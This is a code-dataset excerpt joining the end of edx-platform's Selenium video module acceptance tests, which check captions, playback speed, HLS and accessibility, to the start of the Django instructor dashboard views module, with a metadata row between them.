[{'display_name': 'C', 'metadata': html5_c_metadata}]
]
# open the section with videos (open vertical containing video "A")
self.navigate_to_video()
# check if we can download transcript in "srt" format that has text "00:00:00,260"
self.assertTrue(self.video.downloaded_transcript_contains_text(file_type, search_text))
# open vertical containing video "C"
self.courseware_page.nav.go_to_vertical('Test Vertical-2')
# menu "download_transcript" doesn't exist
self.assertFalse(self.video.is_menu_present('download_transcript'))
def _verify_caption_text(self, text):
self.video._wait_for(
lambda: (text in self.video.captions_text),
u'Captions contain "{}" text'.format(text),
timeout=5
)
def _verify_closed_caption_text(self, text):
"""
Scenario: returns True if the captions are visible, False is else
"""
self.video.wait_for(
lambda: (text in self.video.closed_captions_text),
u'Closed captions contain "{}" text'.format(text),
timeout=5
)
def test_video_language_menu_working(self):
"""
Scenario: Language menu works correctly in Video component
Given the course has a Video component in "Youtube" mode
And I have defined multiple language transcripts for the videos
And I make sure captions are closed
And I see video menu "language" with correct items
And I select language with code "zh"
Then I see "好 各位同学" text in the captions
And I select language with code "en"
Then I see "Welcome to edX." text in the captions
"""
self.assets.extend(['chinese_transcripts.srt', 'subs_3_yD_cEKoCk.srt.sjson'])
data = {'transcripts': {"zh": "chinese_transcripts.srt"}, 'sub': '3_yD_cEKoCk'}
self.metadata = self.metadata_for_mode('youtube', additional_data=data)
# go to video
self.navigate_to_video()
self.video.hide_captions()
correct_languages = {'en': 'English', 'zh': 'Chinese'}
self.assertEqual(self.video.caption_languages, correct_languages)
self.video.select_language('zh')
unicode_text = "好 各位同学".decode('utf-8')
self._verify_caption_text(unicode_text)
self.video.select_language('en')
self._verify_caption_text('Welcome to edX.')
def test_video_language_menu_working_closed_captions(self):
"""
Scenario: Language menu works correctly in Video component, checks closed captions
Given the course has a Video component in "Youtube" mode
And I have defined multiple language transcripts for the videos
And I make sure captions are closed
And I see video menu "language" with correct items
And I select language with code "en"
Then I see "Welcome to edX." text in the closed captions
And I select language with code "zh"
Then I see "我们今天要讲的题目是" text in the closed captions
"""
self.assets.extend(['chinese_transcripts.srt', 'subs_3_yD_cEKoCk.srt.sjson'])
data = {'transcripts': {"zh": "chinese_transcripts.srt"}, 'sub': '3_yD_cEKoCk'}
self.metadata = self.metadata_for_mode('youtube', additional_data=data)
# go to video
self.navigate_to_video()
self.video.show_closed_captions()
correct_languages = {'en': 'English', 'zh': 'Chinese'}
self.assertEqual(self.video.caption_languages, correct_languages)
# we start the video, then pause it to activate the transcript
self.video.click_player_button('play')
self.video.wait_for_position('0:03')
self.video.click_player_button('pause')
self.video.select_language('en')
self.video.click_transcript_line(line_no=1)
self._verify_closed_caption_text('Welcome to edX.')
self.video.select_language('zh')
unicode_text = "我们今天要讲的题目是".decode('utf-8')
self.video.click_transcript_line(line_no=1)
self._verify_closed_caption_text(unicode_text)
def test_video_component_stores_speed_correctly_for_multiple_videos(self):
"""
Scenario: Video component stores speed correctly when each video is in separate sequential
Given I have a video "A" in "Youtube" mode in position "1" of sequential
And a video "B" in "Youtube" mode in position "2" of sequential
And a video "C" in "HTML5" mode in position "3" of sequential
"""
# vertical titles are created in VideoBaseTest._create_single_vertical
# and are of the form Test Vertical-{_} where _ is the index in self.contents_of_verticals
self.contents_of_verticals = [
[{'display_name': 'A'}], [{'display_name': 'B'}],
[{'display_name': 'C', 'metadata': self.metadata_for_mode('html5')}]
]
self.navigate_to_video()
# select the "2.0" speed on video "A"
self.courseware_page.nav.go_to_vertical('Test Vertical-0')
self.video.wait_for_video_player_render()
self.video.speed = '2.0'
# select the "0.50" speed on video "B"
self.courseware_page.nav.go_to_vertical('Test Vertical-1')
self.video.wait_for_video_player_render()
self.video.speed = '0.50'
# open video "C"
self.courseware_page.nav.go_to_vertical('Test Vertical-2')
self.video.wait_for_video_player_render()
# Since the playback speed was set to .5 in "B", this video will also be impacted
# because a playback speed has never explicitly been set for it. However, this video
# does not have a .5 playback option, so the closest possible (.75) should be selected.
self.video.verify_speed_changed('0.75x')
# go to the vertical containing video "A"
self.courseware_page.nav.go_to_vertical('Test Vertical-0')
# Video "A" should still play at speed 2.0 because it was explicitly set to that.
self.assertEqual(self.video.speed, '2.0x')
# reload the page
self.video.reload_page()
# go to the vertical containing video "A"
self.courseware_page.nav.go_to_vertical('Test Vertical-0')
# check if video "A" should start playing at speed "2.0"
self.assertEqual(self.video.speed, '2.0x')
# select the "1.0" speed on video "A"
self.video.speed = '1.0'
# go to the vertical containing "B"
self.courseware_page.nav.go_to_vertical('Test Vertical-1')
# Video "B" should still play at speed .5 because it was explicitly set to that.
self.assertEqual(self.video.speed, '0.50x')
# go to the vertical containing video "C"
self.courseware_page.nav.go_to_vertical('Test Vertical-2')
# The change of speed for Video "A" should impact Video "C" because it still has
# not been explicitly set to a speed.
self.video.verify_speed_changed('1.0x')
def test_video_has_correct_transcript(self):
"""
Scenario: Youtube video has correct transcript if fields for other speeds are filled
Given it has a video in "Youtube" mode
And I have uploaded multiple transcripts
And I make sure captions are opened
Then I see "Welcome to edX." text in the captions
And I select the "1.50" speed
And I reload the page with video
Then I see "Welcome to edX." text in the captions
And I see duration "1:56"
"""
self.assets.extend(['subs_3_yD_cEKoCk.srt.sjson', 'subs_b7xgknqkQk8.srt.sjson'])
data = {'sub': '3_yD_cEKoCk', 'youtube_id_1_5': 'b7xgknqkQk8'}
self.metadata = self.metadata_for_mode('youtube', additional_data=data)
# go to video
self.navigate_to_video()
self.video.show_captions()
self.assertIn('Welcome to edX.', self.video.captions_text)
self.video.speed = '1.50'
self.video.reload_page()
self.assertIn('Welcome to edX.', self.video.captions_text)
self.assertTrue(self.video.duration, '1.56')
def test_video_position_stored_correctly_wo_seek(self):
"""
Scenario: Video component stores position correctly when page is reloaded
Given the course has a Video component in "Youtube" mode
Then the video has rendered in "Youtube" mode
And I click video button "play""
Then I wait until video reaches at position "0.03"
And I click video button "pause"
And I reload the page with video
And I click video button "play""
And I click video button "pause"
Then video slider should be Equal or Greater than "0:03"
"""
self.navigate_to_video()
self.video.click_player_button('play')
self.video.wait_for_position('0:03')
self.video.click_player_button('pause')
self.video.reload_page()
self.video.click_player_button('play')
self.video.click_player_button('pause')
self.assertGreaterEqual(self.video.seconds, 3)
def test_simplified_and_traditional_chinese_transcripts(self):
"""
Scenario: Simplified and Traditional Chinese transcripts work as expected in Youtube mode
Given the course has a Video component in "Youtube" mode
And I have defined a Simplified Chinese transcript for the video
And I have defined a Traditional Chinese transcript for the video
Then I see the correct subtitle language options in cc menu
Then I see the correct text in the captions for Simplified and Traditional Chinese transcripts
And I can download the transcripts for Simplified and Traditional Chinese
And video subtitle menu has 'zh_HANS', 'zh_HANT' translations for 'Simplified Chinese'
and 'Traditional Chinese' respectively
"""
data = {
'download_track': True,
'transcripts': {'zh_HANS': 'simplified_chinese.srt', 'zh_HANT': 'traditional_chinese.srt'}
}
self.metadata = self.metadata_for_mode('youtube', data)
self.assets.extend(['simplified_chinese.srt', 'traditional_chinese.srt'])
self.navigate_to_video()
langs = {'zh_HANS': '在线学习是革', 'zh_HANT': '在線學習是革'}
for lang_code, text in langs.items():
self.video.scroll_to_button("transcript_button")
self.assertTrue(self.video.select_language(lang_code))
unicode_text = text.decode('utf-8')
self.assertIn(unicode_text, self.video.captions_text)
self.assertTrue(self.video.downloaded_transcript_contains_text('srt', unicode_text))
self.assertEqual(self.video.caption_languages, {'zh_HANS': 'Simplified Chinese', 'zh_HANT': 'Traditional Chinese'})
@attr(shard=13)
class YouTubeHtml5VideoTest(VideoBaseTest):
""" Test YouTube HTML5 Video Player """
def test_youtube_video_rendering_with_unsupported_sources(self):
"""
Scenario: Video component is rendered in the LMS in Youtube mode
with HTML5 sources that doesn't supported by browser
Given the course has a Video component in "Youtube_HTML5_Unsupported_Video" mode
Then the video has rendered in "Youtube" mode
"""
self.metadata = self.metadata_for_mode('youtube_html5_unsupported_video')
self.navigate_to_video()
# Verify that the video has rendered in "Youtube" mode
self.assertTrue(self.video.is_video_rendered('youtube'))
@attr(shard=19)
class Html5VideoTest(VideoBaseTest):
""" Test HTML5 Video Player """
def test_autoplay_disabled_for_video_component(self):
"""
Scenario: Autoplay is disabled by default for a Video component
Given the course has a Video component in "HTML5" mode
When I view the Video component
Then it does not have autoplay enabled
"""
self.metadata = self.metadata_for_mode('html5')
self.navigate_to_video()
# Verify that the video has autoplay mode disabled
self.assertFalse(self.video.is_autoplay_enabled)
def test_html5_video_rendering_with_unsupported_sources(self):
"""
Scenario: LMS displays an error message for HTML5 sources that are not supported by browser
Given the course has a Video component in "HTML5_Unsupported_Video" mode
When I view the Video component
Then and error message is shown
And the error message has the correct text
"""
self.metadata = self.metadata_for_mode('html5_unsupported_video')
self.navigate_to_video_no_render()
# Verify that error message is shown
self.assertTrue(self.video.is_error_message_shown)
# Verify that error message has correct text
correct_error_message_text = 'No playable video sources found.'
self.assertIn(correct_error_message_text, self.video.error_message_text)
# Verify that spinner is not shown
self.assertFalse(self.video.is_spinner_shown)
def test_download_button_wo_english_transcript(self):
"""
Scenario: Download button works correctly w/o english transcript in HTML5 mode
Given the course has a Video component in "HTML5" mode
And I have defined a downloadable non-english transcript for the video
And I have uploaded a non-english transcript file to assets
Then I see the correct non-english text in the captions
And the non-english transcript downloads correctly
"""
data = {'download_track': True, 'transcripts': {'zh': 'chinese_transcripts.srt'}}
self.metadata = self.metadata_for_mode('html5', additional_data=data)
self.assets.append('chinese_transcripts.srt')
# go to video
self.navigate_to_video()
# check if we see "好 各位同学" text in the captions
unicode_text = "好 各位同学".decode('utf-8')
self.assertIn(unicode_text, self.video.captions_text)
# check if we can download transcript in "srt" format that has text "好 各位同学"
unicode_text = "好 各位同学".decode('utf-8')
self.assertTrue(self.video.downloaded_transcript_contains_text('srt', unicode_text))
def test_download_button_two_transcript_languages(self):
"""
Scenario: Download button works correctly for multiple transcript languages in HTML5 mode
Given the course has a Video component in "HTML5" mode
And I have defined a downloadable non-english transcript for the video
And I have defined english subtitles for the video
Then I see the correct english text in the captions
And the english transcript downloads correctly
And I see the correct non-english text in the captions
And the non-english transcript downloads correctly
"""
self.assets.extend(['chinese_transcripts.srt', 'subs_3_yD_cEKoCk.srt.sjson'])
data = {'download_track': True, 'transcripts': {'zh': 'chinese_transcripts.srt'}, 'sub': '3_yD_cEKoCk'}
self.metadata = self.metadata_for_mode('html5', additional_data=data)
# go to video
self.navigate_to_video()
# check if "Welcome to edX." text in the captions
self.assertIn('Welcome to edX.', self.video.captions_text)
self.video.wait_for_element_visibility('.transcript-end', 'Transcript has loaded')
# check if we can download transcript in "srt" format that has text "Welcome to edX."
self.assertTrue(self.video.downloaded_transcript_contains_text('srt', 'Welcome to edX.'))
# select language with code "zh"
self.assertTrue(self.video.select_language('zh'))
# check if we see "好 各位同学" text in the captions
unicode_text = "好 各位同学".decode('utf-8')
self.assertIn(unicode_text, self.video.captions_text)
# Then I can download transcript in "srt" format that has text "好 各位同学"
unicode_text = "好 各位同学".decode('utf-8')
self.assertTrue(self.video.downloaded_transcript_contains_text('srt', unicode_text))
def test_full_screen_video_alignment_with_transcript_visible(self):
"""
Scenario: Video is aligned correctly with transcript enabled in fullscreen mode
Given the course has a Video component in "HTML5" mode
And I have uploaded a .srt.sjson file to assets
And I have defined subtitles for the video
When I show the captions
And I view the video at fullscreen
Then the video with the transcript enabled is aligned correctly
"""
self.assets.append('subs_3_yD_cEKoCk.srt.sjson')
data = {'sub': '3_yD_cEKoCk'}
self.metadata = self.metadata_for_mode('html5', additional_data=data)
# go to video
self.navigate_to_video()
# make sure captions are opened
self.video.show_captions()
# click video button "fullscreen"
self.video.click_player_button('fullscreen')
# check if video aligned correctly with enabled transcript
self.assertTrue(self.video.is_aligned(True))
def test_cc_button_with_english_transcript(self):
"""
Scenario: CC button works correctly with only english transcript in HTML5 mode
Given the course has a Video component in "HTML5" mode
And I have defined english subtitles for the video
And I have uploaded an english transcript file to assets
Then I see the correct text in the captions
"""
self.assets.append('subs_3_yD_cEKoCk.srt.sjson')
data = {'sub': '3_yD_cEKoCk'}
self.metadata = self.metadata_for_mode('html5', additional_data=data)
# go to video
self.navigate_to_video()
# make sure captions are opened
self.video.show_captions()
# check if we see "Welcome to edX." text in the captions
self.assertIn("Welcome to edX.", self.video.captions_text)
def test_cc_button_wo_english_transcript(self):
"""
Scenario: CC button works correctly w/o english transcript in HTML5 mode
Given the course has a Video component in "HTML5" mode
And I have defined a non-english transcript for the video
And I have uploaded a non-english transcript file to assets
Then I see the correct text in the captions
"""
self.assets.append('chinese_transcripts.srt')
data = {'transcripts': {'zh': 'chinese_transcripts.srt'}}
self.metadata = self.metadata_for_mode('html5', additional_data=data)
# go to video
self.navigate_to_video()
# make sure captions are opened
self.video.show_captions()
# check if we see "好 各位同学" text in the captions
unicode_text = "好 各位同学".decode('utf-8')
self.assertIn(unicode_text, self.video.captions_text)
def test_video_rendering(self):
"""
Scenario: Video component is fully rendered in the LMS in HTML5 mode
Given the course has a Video component in "HTML5" mode
Then the video has rendered in "HTML5" mode
And video sources are correct
"""
self.metadata = self.metadata_for_mode('html5')
self.navigate_to_video()
self.assertTrue(self.video.is_video_rendered('html5'))
self.assertTrue(all([source in HTML5_SOURCES for source in self.video.sources]))
@attr(shard=13)
class YouTubeQualityTest(VideoBaseTest):
""" Test YouTube Video Quality Button """
@skip_if_browser('firefox')
def test_quality_button_visibility(self):
"""
Scenario: Quality button appears on play.
Given the course has a Video component in "Youtube" mode
Then I see video button "quality" is hidden
And I click video button "play"
Then I see video button "quality" is visible
"""
self.navigate_to_video()
self.assertFalse(self.video.is_quality_button_visible)
self.video.click_player_button('play')
self.video.wait_for(lambda: self.video.is_quality_button_visible, 'waiting for quality button to appear')
@skip_if_browser('firefox')
def test_quality_button_works_correctly(self):
"""
Scenario: Quality button works correctly.
Given the course has a Video component in "Youtube" mode
And I click video button "play"
And I see video button "quality" is inactive
And I click video button "quality"
Then I see video button "quality" is active
"""
self.navigate_to_video()
self.video.click_player_button('play')
self.video.wait_for(lambda: self.video.is_quality_button_visible, 'waiting for quality button to appear')
self.assertFalse(self.video.is_quality_button_active)
self.video.click_player_button('quality')
self.video.wait_for(lambda: self.video.is_quality_button_active, 'waiting for quality button activation')
@attr('a11y')
class LMSVideoModuleA11yTest(VideoBaseTest):
"""
LMS Video Accessibility Test Class
"""
def setUp(self):
browser = os.environ.get('SELENIUM_BROWSER', 'firefox')
# the a11y tests run in CI under phantomjs which doesn't
# support html5 video or flash player, so the video tests
# don't work in it. We still want to be able to run these
# tests in CI, so override the browser setting if it is
# phantomjs.
if browser == 'phantomjs':
browser = 'firefox'
with patch.dict(os.environ, {'SELENIUM_BROWSER': browser}):
super(LMSVideoModuleA11yTest, self).setUp()
def test_video_player_a11y(self):
# load transcripts so we can test skipping to
self.assets.extend(['english_single_transcript.srt', 'subs_3_yD_cEKoCk.srt.sjson'])
data = {'transcripts': {"en": "english_single_transcript.srt"}, 'sub': '3_yD_cEKoCk'}
self.metadata = self.metadata_for_mode('youtube', additional_data=data)
# go to video
self.navigate_to_video()
self.video.show_captions()
# limit the scope of the audit to the video player only.
self.video.a11y_audit.config.set_scope(
include=["div.video"]
)
self.video.a11y_audit.check_for_accessibility_errors()
@attr(shard=11)
class VideoPlayOrderTest(VideoBaseTest):
"""
Test video play order with multiple videos
Priority of video formats is:
* Youtube
* HLS
* HTML5
"""
def setUp(self):
super(VideoPlayOrderTest, self).setUp()
def test_play_youtube_video(self):
"""
Scenario: Correct video is played when we have different video formats.
Given the course has a Video component with Youtube, HTML5 and HLS sources available.
When I view the Video component
Then it should play the Youtube video
"""
additional_data = {'youtube_id_1_0': 'b7xgknqkQk8'}
self.metadata = self.metadata_for_mode('html5_and_hls', additional_data=additional_data)
self.navigate_to_video()
# Verify that the video is youtube
self.assertTrue(self.video.is_video_rendered('youtube'))
def test_play_html5_hls_video(self):
"""
Scenario: HLS video is played when we have HTML5 and HLS video formats only.
Given the course has a Video component with HTML5 and HLS sources available.
When I view the Video component
Then it should play the HLS video
"""
self.metadata = self.metadata_for_mode('html5_and_hls')
self.navigate_to_video()
# Verify that the video is hls
self.assertTrue(self.video.is_video_rendered('hls'))
@attr(shard=11)
class HLSVideoTest(VideoBaseTest):
"""
Tests related to HLS video
"""
def test_video_play_pause(self):
"""
Scenario: Video play and pause is working as expected for hls video
Given the course has a Video component with only HLS source available.
When I view the Video component
Then I can see play and pause are working as expected
"""
self.metadata = self.metadata_for_mode('hls')
self.navigate_to_video()
self.video.click_player_button('play')
self.assertEqual(self.video.state, 'playing')
self.video.click_player_button('pause')
self.assertEqual(self.video.state, 'pause')
def test_video_seek(self):
"""
Scenario: Video seek is working as expected for hls video
Given the course has a Video component with only HLS source available.
When I view the Video component
Then I can seek the video as expected
"""
self.metadata = self.metadata_for_mode('hls')
self.navigate_to_video()
self.video.click_player_button('play')
self.video.wait_for_position('0:02')
self.video.click_player_button('pause')
self.video.seek('0:05')
self.assertEqual(self.video.position, '0:05')
def test_video_download_link(self):
"""
Scenario: Correct video url is selected for download
Given the course has a Video component with Youtube, HTML5 and HLS sources available.
When I view the Video component
Then HTML5 video download url is available
"""
self.metadata = self.metadata_for_mode('html5_and_hls', additional_data={'download_video': True})
self.navigate_to_video()
# Verify that the video download url is correct
self.assertEqual(self.video.video_download_url, HTML5_SOURCES[0])
def test_no_video_download_link_for_hls(self):
"""
Scenario: Video download url is not shown for hls videos
Given the course has a Video component with only HLS sources available.
When I view the Video component
Then there is no video download url shown
"""
additional_data = {'download_video': True}
self.metadata = self.metadata_for_mode('hls', additional_data=additional_data)
self.navigate_to_video()
# Verify that the video download url is not shown
self.assertEqual(self.video.video_download_url, None)
def test_hls_video_with_youtube_blocked(self):
"""
Scenario: HLS video is rendered when the YouTube API is blocked
Given the YouTube API is blocked
And the course has a Video component with Youtube, HTML5 and HLS sources available
Then the HLS video is rendered
"""
# configure youtube server
self.youtube_configuration.update({
'youtube_api_blocked': True,
})
self.metadata = self.metadata_for_mode('html5_and_hls', additional_data={'youtube_id_1_0': 'b7xgknqkQk8'})
self.navigate_to_video()
self.assertTrue(self.video.is_video_rendered('hls'))
def test_hls_video_with_youtube_delayed_response_time(self):
"""
Scenario: HLS video is rendered when the YouTube API response time is slow
Given the YouTube server response time is greater than 1.5 seconds
And the course has a Video component with Youtube, HTML5 and HLS sources available
Then the HLS video is rendered
"""
# configure youtube server
self.youtube_configuration.update({
'time_to_response': 7.0,
})
self.metadata = self.metadata_for_mode('html5_and_hls', additional_data={'youtube_id_1_0': 'b7xgknqkQk8'})
self.navigate_to_video()
self.assertTrue(self.video.is_video_rendered('hls'))
def test_hls_video_with_transcript(self):
"""
Scenario: Transcript work as expected for an HLS video
Given the course has a Video component with "HLS" video only
And I have defined a transcript for the video
Then I see the correct text in the captions for transcript
Then I click on a caption line
And video position should be updated accordingly
Then I change video position
And video caption should be updated accordingly
"""
data = {'transcripts': {'zh': 'transcript.srt'}}
self.metadata = self.metadata_for_mode('hls', additional_data=data)
self.assets.append('transcript.srt')
self.navigate_to_video()
self.assertIn("Hi, edX welcomes you0.", self.video.captions_text)
for line_no in range(5):
self.video.click_transcript_line(line_no=line_no)
self.video.wait_for_position('0:0{}'.format(line_no))
for line_no in range(5):
self.video.seek('0:0{}'.format(line_no))
self.assertEqual(self.video.active_caption_text, 'Hi, edX welcomes you{}.'.format(line_no))
|
Stanford-Online/edx-platform
|
common/test/acceptance/tests/video/test_video_module.py
|
Python
|
agpl-3.0
| 50,719
|
[
"VisIt"
] |
c1f276f4c6ecd616dc9015002d8beda10a75f45607b27c85375cfa5a92b1755b
|
"""
Instructor Dashboard Views
"""
import datetime
import logging
import uuid
from django.conf import settings
import pytz
from openedx.core.lib.xblock_builtin import get_css_dependencies, get_js_dependencies
from django.contrib.auth.decorators import login_required
from django.contrib.auth.models import User
from django.views.decorators.http import require_POST
from django.utils.translation import ugettext as _, ugettext_noop
from django.core.urlresolvers import reverse
from django.http import Http404, HttpResponseServerError
from django.utils.html import escape
from django.views.decorators.cache import cache_control
from django.views.decorators.csrf import ensure_csrf_cookie
from django.views.decorators.http import require_POST
from mock import patch
from opaque_keys import InvalidKeyError
from opaque_keys.edx.keys import CourseKey
from openedx.core.lib.xblock_utils import wrap_xblock
from openedx.core.lib.url_utils import quote_slashes
from xmodule.html_module import HtmlDescriptor
from xmodule.modulestore.django import modulestore
from xmodule.tabs import CourseTab
from xblock.field_data import DictFieldData
from xblock.fields import ScopeIds
from bulk_email.models import BulkEmailFlag
from lms.djangoapps.certificates import api as certs_api
from lms.djangoapps.certificates.models import (
CertificateGenerationConfiguration,
CertificateGenerationHistory,
CertificateInvalidation,
CertificateStatuses,
CertificateWhitelist,
GeneratedCertificate
)
from class_dashboard.dashboard_data import get_array_section_has_problem, get_section_display_name
from course_modes.models import CourseMode, CourseModesArchive
from courseware.access import has_access
from courseware.courses import get_course_by_id, get_studio_url
from django_comment_client.utils import available_division_schemes, has_forum_access
from django_comment_common.models import FORUM_ROLE_ADMINISTRATOR, CourseDiscussionSettings
from edxmako.shortcuts import render_to_response
from lms.djangoapps.courseware.module_render import get_module_by_usage_id
from openedx.core.djangoapps.course_groups.cohorts import DEFAULT_COHORT_NAME, get_course_cohorts, is_course_cohorted
from openedx.core.djangoapps.site_configuration import helpers as configuration_helpers
from openedx.core.djangoapps.verified_track_content.models import VerifiedTrackCohortedCourse
from openedx.core.djangolib.markup import HTML, Text
from openedx.core.lib.url_utils import quote_slashes
from openedx.core.lib.xblock_utils import wrap_xblock
from shoppingcart.models import Coupon, CourseRegCodeItem, PaidCourseRegistration
from student.models import CourseEnrollment
from student.roles import CourseFinanceAdminRole, CourseSalesAdminRole, CourseStaffRole, CourseInstructorRole
from util.json_request import JsonResponse
from xmodule.html_module import HtmlDescriptor
from xmodule.modulestore.django import modulestore
from xmodule.tabs import CourseTab
from .tools import get_units_with_due_date, title_or_url
log = logging.getLogger(__name__)
class InstructorDashboardTab(CourseTab):
"""
Defines the Instructor Dashboard view type that is shown as a course tab.
"""
type = "instructor"
title = ugettext_noop('Instructor')
view_name = "instructor_dashboard"
is_dynamic = True # The "Instructor" tab is instead dynamically added when it is enabled
@classmethod
def is_enabled(cls, course, user=None):
"""
Returns true if the specified user has staff access.
"""
return bool(user and has_access(user, 'staff', course, course.id))
def show_analytics_dashboard_message(course_key):
"""
Defines whether or not the analytics dashboard URL should be displayed.
Arguments:
course_key (CourseLocator): The course locator to display the analytics dashboard message on.
"""
if hasattr(course_key, 'ccx'):
ccx_analytics_enabled = settings.FEATURES.get('ENABLE_CCX_ANALYTICS_DASHBOARD_URL', False)
return settings.ANALYTICS_DASHBOARD_URL and ccx_analytics_enabled
return settings.ANALYTICS_DASHBOARD_URL
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
def instructor_dashboard_2(request, course_id):
""" Display the instructor dashboard for a course. """
try:
course_key = CourseKey.from_string(course_id)
except InvalidKeyError:
log.error(u"Unable to find course with course key %s while loading the Instructor Dashboard.", course_id)
return HttpResponseServerError()
course = get_course_by_id(course_key, depth=0)
access = {
'admin': request.user.is_staff,
'instructor': bool(has_access(request.user, 'instructor', course)),
'finance_admin': CourseFinanceAdminRole(course_key).has_user(request.user),
'sales_admin': CourseSalesAdminRole(course_key).has_user(request.user),
'staff': bool(has_access(request.user, 'staff', course)),
'forum_admin': has_forum_access(request.user, course_key, FORUM_ROLE_ADMINISTRATOR),
}
if not access['staff']:
raise Http404()
is_white_label = CourseMode.is_white_label(course_key)
reports_enabled = configuration_helpers.get_value('SHOW_ECOMMERCE_REPORTS', False)
sections = [
_section_course_info(course, access),
_section_membership(course, access, is_white_label),
_section_cohort_management(course, access),
_section_discussions_management(course, access),
_section_student_admin(course, access),
_section_data_download(course, access),
]
analytics_dashboard_message = None
if show_analytics_dashboard_message(course_key):
# Construct a URL to the external analytics dashboard
analytics_dashboard_url = '{0}/courses/{1}'.format(settings.ANALYTICS_DASHBOARD_URL, unicode(course_key))
link_start = HTML("<a href=\"{}\" target=\"_blank\">").format(analytics_dashboard_url)
analytics_dashboard_message = _(
"To gain insights into student enrollment and participation {link_start}"
"visit {analytics_dashboard_name}, our new course analytics product{link_end}."
)
analytics_dashboard_message = Text(analytics_dashboard_message).format(
link_start=link_start, link_end=HTML("</a>"), analytics_dashboard_name=settings.ANALYTICS_DASHBOARD_NAME)
# Temporarily show the "Analytics" section until we have a better way of linking to Insights
sections.append(_section_analytics(course, access))
# Check if there is corresponding entry in the CourseMode Table related to the Instructor Dashboard course
course_mode_has_price = False
paid_modes = CourseMode.paid_modes_for_course(course_key)
if len(paid_modes) == 1:
course_mode_has_price = True
elif len(paid_modes) > 1:
log.error(
u"Course %s has %s course modes with payment options. Course must only have "
u"one paid course mode to enable eCommerce options.",
unicode(course_key), len(paid_modes)
)
if settings.FEATURES.get('INDIVIDUAL_DUE_DATES') and access['instructor']:
sections.insert(3, _section_extensions(course))
# Gate access to course email by feature flag & by course-specific authorization
if BulkEmailFlag.feature_enabled(course_key):
sections.append(_section_send_email(course, access))
# Gate access to Metrics tab by featue flag and staff authorization
if settings.FEATURES['CLASS_DASHBOARD'] and access['staff']:
sections.append(_section_metrics(course, access))
# Gate access to Ecommerce tab
if course_mode_has_price and (access['finance_admin'] or access['sales_admin']):
sections.append(_section_e_commerce(course, access, paid_modes[0], is_white_label, reports_enabled))
# Gate access to Special Exam tab depending if either timed exams or proctored exams
# are enabled in the course
user_has_access = any([
request.user.is_staff,
CourseStaffRole(course_key).has_user(request.user),
CourseInstructorRole(course_key).has_user(request.user)
])
course_has_special_exams = course.enable_proctored_exams or course.enable_timed_exams
can_see_special_exams = course_has_special_exams and user_has_access and settings.FEATURES.get(
'ENABLE_SPECIAL_EXAMS', False)
if can_see_special_exams:
sections.append(_section_special_exams(course, access))
# Certificates panel
# This is used to generate example certificates
# and enable self-generated certificates for a course.
# Note: This is hidden for all CCXs
certs_enabled = CertificateGenerationConfiguration.current().enabled and not hasattr(course_key, 'ccx')
if certs_enabled and access['admin']:
sections.append(_section_certificates(course))
# define a generic function to get any category of xblock
def get_course_blocks(course_key, category):
"""
Retrieve all XBlocks in the course for a particular category.
Returns only XBlocks that are published and haven't been deleted.
"""
# Note: we need to check if found components have been orphaned
# due to a bug in split modulestore (PLAT-799). Once that bug
# is resolved, we can skip the `_is_in_course_tree()` check entirely.
return [
block for block in modulestore().get_items(
course_key,
qualifiers={"category": category},
)
]
openassessment_blocks = modulestore().get_items(
course_key, qualifiers={'category': 'openassessment'}
)
# filter out orphaned openassessment blocks
openassessment_blocks = [
block for block in openassessment_blocks if block.parent is not None
]
if len(openassessment_blocks) > 0:
sections.append(_section_open_response_assessment(request, course, openassessment_blocks, access))
# Get all the recap xblocks in a course
recap_blocks = get_course_blocks(course_key, "recap")
# Add the Recap instructor dashboard tab if there is a recap Xblock
if len(recap_blocks) > 0:
sections.append(_section_recap(request, course, recap_blocks, access))
disable_buttons = not _is_small_course(course_key)
certificate_white_list = CertificateWhitelist.get_certificate_white_list(course_key)
generate_certificate_exceptions_url = reverse( # pylint: disable=invalid-name
'generate_certificate_exceptions',
kwargs={'course_id': unicode(course_key), 'generate_for': ''}
)
generate_bulk_certificate_exceptions_url = reverse( # pylint: disable=invalid-name
'generate_bulk_certificate_exceptions',
kwargs={'course_id': unicode(course_key)}
)
certificate_exception_view_url = reverse(
'certificate_exception_view',
kwargs={'course_id': unicode(course_key)}
)
certificate_invalidation_view_url = reverse( # pylint: disable=invalid-name
'certificate_invalidation_view',
kwargs={'course_id': unicode(course_key)}
)
certificate_invalidations = CertificateInvalidation.get_certificate_invalidations(course_key)
context = {
'course': course,
'studio_url': get_studio_url(course, 'course'),
'sections': sections,
'disable_buttons': disable_buttons,
'analytics_dashboard_message': analytics_dashboard_message,
'certificate_white_list': certificate_white_list,
'certificate_invalidations': certificate_invalidations,
'generate_certificate_exceptions_url': generate_certificate_exceptions_url,
'generate_bulk_certificate_exceptions_url': generate_bulk_certificate_exceptions_url,
'certificate_exception_view_url': certificate_exception_view_url,
'certificate_invalidation_view_url': certificate_invalidation_view_url,
}
return render_to_response('instructor/instructor_dashboard_2/instructor_dashboard_2.html', context)
## Section functions starting with _section return a dictionary of section data.
## The dictionary must include at least {
## 'section_key': 'circus_expo'
## 'section_display_name': 'Circus Expo'
## }
## section_key will be used as a css attribute, javascript tie-in, and template import filename.
## section_display_name will be used to generate link titles in the nav bar.
def _section_e_commerce(course, access, paid_mode, coupons_enabled, reports_enabled):
""" Provide data for the corresponding dashboard section """
course_key = course.id
coupons = Coupon.objects.filter(course_id=course_key).order_by('-is_active')
course_price = paid_mode.min_price
total_amount = None
if access['finance_admin']:
single_purchase_total = PaidCourseRegistration.get_total_amount_of_purchased_item(course_key)
bulk_purchase_total = CourseRegCodeItem.get_total_amount_of_purchased_item(course_key)
total_amount = single_purchase_total + bulk_purchase_total
section_data = {
'section_key': 'e-commerce',
'section_display_name': _('E-Commerce'),
'access': access,
'course_id': unicode(course_key),
'currency_symbol': configuration_helpers.get_value('PAID_COURSE_REGISTRATION_CURRENCY', settings.PAID_COURSE_REGISTRATION_CURRENCY)[1],
'ajax_remove_coupon_url': reverse('remove_coupon', kwargs={'course_id': unicode(course_key)}),
'ajax_get_coupon_info': reverse('get_coupon_info', kwargs={'course_id': unicode(course_key)}),
'get_user_invoice_preference_url': reverse('get_user_invoice_preference', kwargs={'course_id': unicode(course_key)}),
'sale_validation_url': reverse('sale_validation', kwargs={'course_id': unicode(course_key)}),
'ajax_update_coupon': reverse('update_coupon', kwargs={'course_id': unicode(course_key)}),
'ajax_add_coupon': reverse('add_coupon', kwargs={'course_id': unicode(course_key)}),
'get_sale_records_url': reverse('get_sale_records', kwargs={'course_id': unicode(course_key)}),
